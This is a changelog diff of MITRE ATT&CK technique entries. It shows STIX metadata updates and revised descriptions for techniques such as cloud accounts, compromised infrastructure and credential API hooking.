Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-11 22:30:01.227000+00:00 | 2025-04-16 20:37:21.515000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1070.001] Indicator Removal: Clear Windows Event Logs
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti Virus', 'Host Intrusion Prevention Systems', 'Log Analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:40:58.536000+00:00 | 2025-04-15 19:58:36.700000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
[T1127.002] Trusted Developer Utilities Proxy Execution: ClickOnce
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['.NET Framework'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-17 18:50:41.474000+00:00 | 2025-04-15 19:59:08.154000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1059.009] Command and Scripting Interpreter: Cloud API
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:44:20.143000+00:00 | 2025-04-15 19:58:32.612000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1078.004] Valid Accounts: Cloud Accounts
Current version: 1.9
Version changed from: 1.8 → 1.9
|
|
|---|
| t | Valid accounts in cloud environments may allow adversaries t | t | Valid accounts in cloud environments may allow adversaries t |
| o perform actions to achieve Initial Access, Persistence, Pr | | o perform actions to achieve Initial Access, Persistence, Pr |
| ivilege Escalation, or Defense Evasion. Cloud accounts are t | | ivilege Escalation, or Defense Evasion. Cloud accounts are t |
| hose created and configured by an organization for use by us | | hose created and configured by an organization for use by us |
| ers, remote support, services, or for administration of reso | | ers, remote support, services, or for administration of reso |
| urces within a cloud service provider or SaaS application. C | | urces within a cloud service provider or SaaS application. C |
| loud Accounts can exist solely in the cloud; alternatively, | | loud Accounts can exist solely in the cloud; alternatively, |
| they may be hybrid-joined between on-premises systems and th | | they may be hybrid-joined between on-premises systems and th |
| e cloud through syncing or federation with other identity so | | e cloud through syncing or federation with other identity so |
| urces such as Windows Active Directory. (Citation: AWS Ident | | urces such as Windows Active Directory.(Citation: AWS Identi |
| ity Federation)(Citation: Google Federating GC)(Citation: Mi | | ty Federation)(Citation: Google Federating GC)(Citation: Mic |
| crosoft Deploying AD Federation) Service or user accounts m | | rosoft Deploying AD Federation) Service or user accounts ma |
| ay be targeted by adversaries through [Brute Force](https:// | | y be targeted by adversaries through [Brute Force](https://a |
| attack.mitre.org/techniques/T1110), [Phishing](https://attac | | ttack.mitre.org/techniques/T1110), [Phishing](https://attack |
| k.mitre.org/techniques/T1566), or various other means to gai | | .mitre.org/techniques/T1566), or various other means to gain |
| n access to the environment. Federated or synced accounts ma | | access to the environment. Federated or synced accounts may |
| y be a pathway for the adversary to affect both on-premises | | be a pathway for the adversary to affect both on-premises s |
| systems and cloud environments - for example, by leveraging | | ystems and cloud environments - for example, by leveraging s |
| shared credentials to log onto [Remote Services](https://att | | hared credentials to log onto [Remote Services](https://atta |
| ack.mitre.org/techniques/T1021). High privileged cloud accou | | ck.mitre.org/techniques/T1021). High privileged cloud accoun |
| nts, whether federated, synced, or cloud-only, may also allo | | ts, whether federated, synced, or cloud-only, may also allow |
| w pivoting to on-premises environments by leveraging SaaS-ba | | pivoting to on-premises environments by leveraging SaaS-bas |
| sed [Software Deployment Tools](https://attack.mitre.org/tec | | ed [Software Deployment Tools](https://attack.mitre.org/tech |
| hniques/T1072) to run commands on hybrid-joined devices. An | | niques/T1072) to run commands on hybrid-joined devices. An |
| adversary may create long lasting [Additional Cloud Credent | | adversary may create long lasting [Additional Cloud Credenti |
| ials](https://attack.mitre.org/techniques/T1098/001) on a co | | als](https://attack.mitre.org/techniques/T1098/001) on a com |
| mpromised cloud account to maintain persistence in the envir | | promised cloud account to maintain persistence in the enviro |
| onment. Such credentials may also be used to bypass security | | nment. Such credentials may also be used to bypass security |
| controls such as multi-factor authentication. Cloud accou | | controls such as multi-factor authentication. Cloud accoun |
| nts may also be able to assume [Temporary Elevated Cloud Acc | | ts may also be able to assume [Temporary Elevated Cloud Acce |
| ess](https://attack.mitre.org/techniques/T1548/005) or other | | ss](https://attack.mitre.org/techniques/T1548/005) or other |
| privileges through various means within the environment. Mi | | privileges through various means within the environment. Mis |
| sconfigurations in role assignments or role assumption polic | | configurations in role assignments or role assumption polici |
| ies may allow an adversary to use these mechanisms to levera | | es may allow an adversary to use these mechanisms to leverag |
| ge permissions outside the intended scope of the account. Su | | e permissions outside the intended scope of the account. Suc |
| ch over privileged accounts may be used to harvest sensitive | | h over privileged accounts may be used to harvest sensitive |
| data from online storage accounts and databases through [Cl | | data from online storage accounts and databases through [Clo |
| oud API](https://attack.mitre.org/techniques/T1059/009) or o | | ud API](https://attack.mitre.org/techniques/T1059/009) or ot |
| ther methods. | | her methods. For example, in Azure environments, adversaries |
| | | may target Azure Managed Identities, which allow associated |
| | | Azure resources to request access tokens. By compromising a |
| | | resource with an attached Managed Identity, such as an Azur |
| | | e VM, adversaries may be able to [Steal Application Access T |
| | | oken](https://attack.mitre.org/techniques/T1528)s to move la |
| | | terally across the cloud environment.(Citation: SpecterOps M |
| | | anaged Identity 2022) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:59:20.556000+00:00 |
| description | Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.
An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication.
Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods.
| Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.
An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication.
Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods. For example, in Azure environments, adversaries may target Azure Managed Identities, which allow associated Azure resources to request access tokens. By compromising a resource with an attached Managed Identity, such as an Azure VM, adversaries may be able to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s to move laterally across the cloud environment.(Citation: SpecterOps Managed Identity 2022) |
| x_mitre_version | 1.8 | 1.9 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'SpecterOps Managed Identity 2022', 'description': 'Andy Robbins. (2022, June 6). Managed Identity Attack Paths, Part 1: Automation Accounts. Retrieved March 18, 2025.', 'url': 'https://posts.specterops.io/managed-identity-attack-paths-part-1-automation-accounts-82667d17187a?gi=6a9daedade1c'} |
| x_mitre_contributors | | Eliraz Levi, Hunters Security |
| x_mitre_contributors | | Alon Klayman, Hunters Security |
[T1651] Cloud Administration Command
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 13:42:42.543000+00:00 | 2025-04-15 19:59:13.081000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
[T1538] Cloud Service Dashboard
Current version: 1.5
Version changed from: 1.4 → 1.5
|
|
|---|
| t | An adversary may use a cloud service dashboard GUI with stol | t | An adversary may use a cloud service dashboard GUI with stol |
| en credentials to gain useful information from an operationa | | en credentials to gain useful information from an operationa |
| l cloud environment, such as specific services, resources, a | | l cloud environment, such as specific services, resources, a |
| nd features. For example, the GCP Command Center can be used | | nd features. For example, the GCP Command Center can be used |
| to view all assets, findings of potential security risks, a | | to view all assets, review findings of potential security r |
| nd to run additional queries, such as finding public IP addr | | isks, and run additional queries, such as finding public IP |
| esses and open ports.(Citation: Google Command Center Dashbo | | addresses and open ports.(Citation: Google Command Center Da |
| ard) Depending on the configuration of the environment, an | | shboard) Depending on the configuration of the environment, |
| adversary may be able to enumerate more information via the | | an adversary may be able to enumerate more information via |
| graphical dashboard than an API. This allows the adversary t | | the graphical dashboard than an API. This also allows the ad |
| o gain information without making any API requests. | | versary to gain information without manually making any API |
| | | requests. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:51:56.279000+00:00 | 2025-04-15 19:59:16.288000+00:00 |
| description | An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests. | An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, review findings of potential security risks, and run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This also allows the adversary to gain information without manually making any API requests. |
| x_mitre_version | 1.4 | 1.5 |
[T1553.002] Subvert Trust Controls: Code Signing
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Windows User Account Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-22 19:13:52.548000+00:00 | 2025-04-16 20:37:16.240000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[T1553.006] Subvert Trust Controls: Code Signing Policy Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['User Mode Signature Validation', 'Digital Certificate Validation', 'Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-05 05:00:03.480000+00:00 | 2025-04-15 19:58:33.055000+00:00 |
| external_references[3]['description'] | Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020. | Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html | https://web.archive.org/web/20210920172620/https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1059] Command and Scripting Interpreter
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:41.855000+00:00 |
| x_mitre_version | 2.5 | 2.6 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1027.004] Obfuscated Files or Information: Compile After Delivery
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Signature-based detection', 'Host intrusion prevention systems', 'Anti-virus', 'Binary Analysis', 'Static File Analysis'] | |
| x_mitre_system_requirements | ['Compiler software (either native to the system or delivered by the adversary)'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-03 17:43:14.766000+00:00 | 2025-04-15 19:59:06.564000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1218.001] System Binary Proxy Execution: Compiled HTML File
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-18 16:31:56.936000+00:00 | 2025-04-15 19:58:56.001000+00:00 |
| x_mitre_version | 2.1 | 2.2 |
[T1542.002] Pre-OS Boot: Component Firmware
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Host intrusion prevention systems', 'File monitoring'] | |
| x_mitre_permissions_required | ['SYSTEM'] | |
| x_mitre_system_requirements | ['Ability to update component device firmware from the host operating system.'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-01 20:43:55.632000+00:00 | 2025-04-15 19:58:43.347000+00:00 |
| external_references[3]['description'] | Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018. | Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html | https://www.computerworld.com/article/1484887/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html |
| x_mitre_version | 1.1 | 1.2 |
[T1559.001] Inter-Process Communication: Component Object Model
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-07-26 22:51:20.448000+00:00 | 2025-04-15 19:58:18.425000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1546.015] Event Triggered Execution: Component Object Model Hijacking
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-21 12:34:29.402000+00:00 | 2025-04-16 20:37:20.012000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[T1554] Compromise Host Software Binary
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-12 16:52:46.067000+00:00 | 2025-04-15 19:58:52.206000+00:00 |
| x_mitre_version | 2.1 | 2.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1584] Compromise Infrastructure
Current version: 1.6
Version changed from: 1.5 → 1.6
|
|
|---|
| t | Adversaries may compromise third-party infrastructure that c | t | Adversaries may compromise third-party infrastructure that c |
| an be used during targeting. Infrastructure solutions includ | | an be used during targeting. Infrastructure solutions includ |
| e physical or cloud servers, domains, network devices, and t | | e physical or cloud servers, domains, network devices, and t |
| hird-party web and DNS services. Instead of buying, leasing, | | hird-party web and DNS services. Instead of buying, leasing, |
| or renting infrastructure an adversary may compromise infra | | or renting infrastructure an adversary may compromise infra |
| structure and use it during other phases of the adversary li | | structure and use it during other phases of the adversary li |
| fecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameH | | fecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameH |
| ijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: Fir | | ijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: Fir |
| eEye EPS Awakens Part 2) Additionally, adversaries may compr | | eEye EPS Awakens Part 2) Additionally, adversaries may compr |
| omise numerous machines to form a botnet they can leverage. | | omise numerous machines to form a botnet they can leverage. |
| Use of compromised infrastructure allows adversaries to sta | | Use of compromised infrastructure allows adversaries to sta |
| ge, launch, and execute operations. Compromised infrastructu | | ge, launch, and execute operations. Compromised infrastructu |
| re can help adversary operations blend in with traffic that | | re can help adversary operations blend in with traffic that |
| is seen as normal, such as contact with high reputation or t | | is seen as normal, such as contact with high reputation or t |
| rusted sites. For example, adversaries may leverage compromi | | rusted sites. For example, adversaries may leverage compromi |
| sed infrastructure (potentially also in conjunction with [Di | | sed infrastructure (potentially also in conjunction with [Di |
| gital Certificates](https://attack.mitre.org/techniques/T158 | | gital Certificates](https://attack.mitre.org/techniques/T158 |
| 8/004)) to further blend in and support staged information g | | 8/004)) to further blend in and support staged information g |
| athering and/or [Phishing](https://attack.mitre.org/techniqu | | athering and/or [Phishing](https://attack.mitre.org/techniqu |
| es/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Addi | | es/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Adve |
| tionally, adversaries may also compromise infrastructure to | | rsaries may also compromise numerous machines to support [Pr |
| support [Proxy](https://attack.mitre.org/techniques/T1090) a | | oxy](https://attack.mitre.org/techniques/T1090) and/or proxy |
| nd/or proxyware services.(Citation: amnesty_nso_pegasus)(Cit | | ware services or to form a botnet.(Citation: amnesty_nso_peg |
| ation: Sysdig Proxyjacking) By using compromised infrastruc | | asus)(Citation: Sysdig Proxyjacking) Additionally, adversari |
| ture, adversaries may make it difficult to tie their actions | | es may compromise infrastructure residing in close proximity |
| back to them. Prior to targeting, adversaries may compromis | | to a target in order to gain [Initial Access](https://attac |
| e the infrastructure of other adversaries.(Citation: NSA NCS | | k.mitre.org/tactics/TA0001) via [Wi-Fi Networks](https://att |
| C Turla OilRig) | | ack.mitre.org/techniques/T1669).(Citation: Nearest Neighbor |
| | | Volexity) By using compromised infrastructure, adversaries |
| | | may enable follow-on malicious operations. Prior to targetin |
| | | g, adversaries may also compromise the infrastructure of oth |
| | | er adversaries.(Citation: NSA NCSC Turla OilRig) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 20:06:03.570000+00:00 | 2025-04-15 19:58:45.612000+00:00 |
| description | Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking)
By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) | Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Adversaries may also compromise numerous machines to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services or to form a botnet.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking) Additionally, adversaries may compromise infrastructure residing in close proximity to a target in order to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) via [Wi-Fi Networks](https://attack.mitre.org/techniques/T1669).(Citation: Nearest Neighbor Volexity)
By using compromised infrastructure, adversaries may enable follow-on malicious operations. Prior to targeting, adversaries may also compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) |
| external_references[4]['description'] | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017. | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.icann.org/groups/ssac/documents/sac-007-en | https://www.icann.org/en/ssac/registration-services/documents/sac-007-domain-name-hijacking-incidents-threats-risks-and-remediation-12-07-2005-en |
| external_references[9]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024. |
| external_references[9]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/ |
| x_mitre_version | 1.5 | 1.6 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Nearest Neighbor Volexity', 'description': 'Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.', 'url': 'https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/'} |
| x_mitre_contributors | | Cian Heasley |
| x_mitre_contributors | | Rouven Bissinger (SySS GmbH) |
[T1609] Container Administration Command
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:25:45.507000+00:00 | 2025-04-15 19:58:44.024000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1053.007] Scheduled Task/Job: Container Orchestration Job
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:26:03.731000+00:00 | 2025-04-15 19:58:07.487000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
[T1218.002] System Binary Proxy Execution: Control Panel
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application control'] | |
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-11 19:01:55.821000+00:00 | 2025-04-15 19:58:29.962000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
[T1136] Create Account
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:53:21.895000+00:00 | 2025-04-15 19:59:14.796000+00:00 |
| x_mitre_version | 2.5 | 2.6 |
| x_mitre_platforms[4] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1134.002] Access Token Manipulation: Create Process with Token
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Windows User Account Control', 'System access controls', 'File system access controls'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-11 21:14:37.714000+00:00 | 2025-04-16 20:37:17.537000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[T1056.004] Input Capture: Credential API Hooking
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Adversaries may hook into Windows application programming in | t | Adversaries may hook into Windows application programming in |
| terface (API) functions to collect user credentials. Malicio | | terface (API) functions and Linux system functions to collec |
| us hooking mechanisms may capture API calls that include par | | t user credentials. Malicious hooking mechanisms may capture |
| ameters that reveal user authentication credentials.(Citatio | | API or function calls that include parameters that reveal u |
| n: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike | | ser authentication credentials.(Citation: Microsoft TrojanSp |
| [Keylogging](https://attack.mitre.org/techniques/T1056/001), | | y:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https:// |
| this technique focuses specifically on API functions that | | attack.mitre.org/techniques/T1056/001), this technique focus |
| include parameters that reveal user credentials. Hooking inv | | es specifically on API functions that include parameters tha |
| olves redirecting calls to these functions and can be implem | | t reveal user credentials. In Windows, hooking involves re |
| ented via: * **Hooks procedures**, which intercept and exec | | directing calls to these functions and can be implemented vi |
| ute designated code in response to events such as messages, | | a: * **Hooks procedures**, which intercept and execute desi |
| keystrokes, and mouse inputs.(Citation: Microsoft Hook Overv | | gnated code in response to events such as messages, keystrok |
| iew)(Citation: Elastic Process Injection July 2017) * **Impo | | es, and mouse inputs.(Citation: Microsoft Hook Overview)(Cit |
| rt address table (IAT) hooking**, which use modifications to | | ation: Elastic Process Injection July 2017) * **Import addre |
| a process’s IAT, where pointers to imported API functions a | | ss table (IAT) hooking**, which use modifications to a proce |
| re stored.(Citation: Elastic Process Injection July 2017)(Ci | | ss’s IAT, where pointers to imported API functions are store |
| tation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInf | | d.(Citation: Elastic Process Injection July 2017)(Citation: |
| oSecurity Dynamic Hooking 2015) * **Inline hooking**, which | | Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurit |
| overwrites the first bytes in an API function to redirect co | | y Dynamic Hooking 2015) * **Inline hooking**, which overwrit |
| de flow.(Citation: Elastic Process Injection July 2017)(Cita | | es the first bytes in an API function to redirect code flow. |
| tion: HighTech Bridge Inline Hooking Sept 2011)(Citation: MW | | (Citation: Elastic Process Injection July 2017)(Citation: Hi |
